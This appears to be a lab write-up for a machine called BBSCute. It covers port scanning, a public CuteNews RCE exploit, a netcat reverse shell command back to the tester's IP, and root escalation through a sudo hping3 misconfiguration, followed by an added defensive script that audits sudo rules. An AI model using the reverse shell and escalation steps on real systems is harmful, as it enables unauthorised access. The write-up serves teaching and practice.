🐧BBSCute

192.168.105.128

Enumeration

Nmap scan

nmap 192.168.105.128 -p- -sV -T4 -A

Port 22

Port 80

Dirbuster found lots of directories. Got the service and version number. This specific version does have RCE exploits available.

Shell

Using the exploit from https://github.com/dinesh876/CVE-2019-11447-POC and creating a normal user account, I was able to get a shell. I had to find captcha.php to get the account registered.

Had the server connect back to me as the previous shell was just a webshell.

nc -c bash 192.168.49.105 6666

Sudo perms.

This was a little hard to get right for escalation using https://gtfobins.github.io/gtfobins/hping3/

Running hping3 drops you at an hping3 prompt; from there, run /bin/sh -p and bam, you're root.
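
A defender-side check for the sudo misconfiguration used above, as an added example that is not part of the original writeup: it parses `sudo -l` output and flags rules that grant shell-capable binaries such as hping3. The sample listing, the user and host names, and the binary list beyond hping3 are constructed assumptions.

```python
import os
import re

# Binaries whose interactive mode can spawn a shell. hping3 is the one named on
# this page; the rest are an illustrative, non-exhaustive assumption.
SHELL_CAPABLE = {"hping3", "vim", "less", "find", "awk"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample listing (user, host and rules are made up for the example).
SAMPLE = """\
Matching Defaults entries for webuser on host:
    env_reset, mail_badpass

User webuser may run the following commands on host:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
    (root) /usr/sbin/reboot
"""


def audit_sudo_listing(text):
    """Return one finding per sudo rule that grants a shell-capable binary or ALL."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults entries and headers do not start with "(runas)"
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Simplification: commas escaped inside command arguments are not handled.
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append(
                    {"runas": runas, "nopasswd": nopasswd, "binary": binary, "rule": cmd}
                )
    return findings


if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        auth = "no password" if f["nopasswd"] else "password required"
        print(f"[!] {f['rule']} as {f['runas']} ({auth}): review or remove this rule")
```

Feed it the output of `sudo -l -U <account>` collected for each service account; any hit is a rule to remove or replace with a wrapper that takes no interactive input.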

Root
